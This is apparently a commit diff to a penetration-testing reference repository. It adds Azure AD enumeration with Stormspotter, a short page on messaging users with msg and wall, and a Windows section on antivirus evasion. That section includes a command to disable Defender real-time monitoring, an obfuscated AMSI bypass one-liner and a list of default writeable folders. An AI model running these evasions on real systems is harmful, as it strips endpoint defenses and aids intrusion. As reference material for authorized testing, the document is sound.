Misc & Tricks Page + AMSI + Defender

Methodology and Resources/Cloud - Azure Pentest.md

@@ -205,6 +205,19 @@ PS C:\> .\AzureADRecon.ps1 -Credential $creds
 PS C:\>.\AzureADRecon.ps1 -GenExcel C:\AzureADRecon-Report-<timestamp>
 ```
 
+Stormspotter,  graphing Azure and Azure Active Directory objects
+
+```powershell
+$ docker run --name stormspotter -p7474:7474 -p7687:7687 -d --env NEO4J_AUTH=neo4j/[password] neo4j:3.5.18
+git clone https://github.com/Azure/Stormspotter
+cd Stormspotter
+pipenv install .
+stormspotter --cli
+stormdash -dbu <neo4j-user> -dbp <neo4j-pass>
+Browse to http://127.0.0.1:8050 to interact with the graph.
+```
+
+Other interesting commands to enumerate Azure AD.
 
 ```powershell
 # Azure AD powershell module
@@ -470,7 +483,7 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an
 ## References
 
 * [An introduction to penetration testing Azure - Graceful Security](https://www.gracefulsecurity.com/an-introduction-to-penetration-testing-azure/)
-* [Running POwershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/)
+* [Running Powershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/)
 * [Attacking Azure Cloud shell - Netspi](https://blog.netspi.com/attacking-azure-cloud-shell/)
 * [Maintaining Azure Persistence via automation accounts - Netspi](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/)
 * [Detecting an attacks on active directory with Azure - Smartspate](https://www.smartspate.com/detecting-an-attacks-on-active-directory-with-azure/)

Methodology and Resources/Miscellaneous - Tricks.md

@@ -0,0 +1,17 @@
+# Miscellaneous & Tricks
+
+All the tricks that couldn't be classified somewhere else.
+
+## Send a message to another user
+
+```powershell
+# Windows
+PS C:\> msg Swissky /SERVER:CRASHLAB "Stop rebooting the XXXX service !"
+PS C:\> msg * /V /W /SERVER:CRASHLAB "Hello all !"
+
+# Linux
+$ wall "Stop messing with the XXX service !"
+$ wall -n "System will go down for 2 hours maintenance at 13:00 PM"  # "-n" only for root
+$ who
+$ write root pts/2	# press Ctrl+D  after typing the message. 
+```

Methodology and Resources/Windows - Privilege Escalation.md

@@ -6,7 +6,11 @@
 * [Windows Version and Configuration](#windows-version-and-configuration)
 * [User Enumeration](#user-enumeration)
 * [Network Enumeration](#network-enumeration)
-* [AppLocker Enumeration](#applocker-enumeration)
+* [Antivirus & Detections](#antivirus--detections)
+    * [Windows Defender](#windows-defender)
+    * [AppLocker Enumeration](#applocker-enumeration)
+    * [Powershell](#powershell)
+    * [Default Writeable Folders](#default-writeable-folders)
 * [EoP - Looting for passwords](#eop---looting-for-passwords)
     * [SAM and SYSTEM files](#sam-and-system-files)
     * [Search for file contents](#search-for-file-contents)
@@ -223,11 +227,55 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
 Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
 ```
 
-## AppLocker Enumeration
+## Antivirus & Detections
+
+### Windows Defender
+
+```powershell
+# check status of Defender
+PS C:\> Get-MpComputerStatus
+
+# disable Real Time Monitoring
+PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
+```
+
+### AppLocker Enumeration
 
 - With the GPO
 - HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).
 
+List AppLocker rules
+
+```powershell
+PS C:\> $a = Get-ApplockerPolicy -effective
+PS C:\> $a.rulecollections
+```
+
+### Powershell
+
+Default powershell locations in a Windows system.
+
+```powershell
+C:\windows\syswow64\windowspowershell\v1.0\powershell
+C:\Windows\System32\WindowsPowerShell\v1.0\powershell
+```
+
+Example of AMSI Bypass.
+
+```powershell
+PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
+```
+
+
+### Default Writeable Folders
+
+```powershell
+C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
+C:\Windows\System32\spool\drivers\color
+C:\Windows\Tasks
+C:\windows\tracing
+```
+
 ## EoP - Looting for passwords
 
 ### SAM and SYSTEM files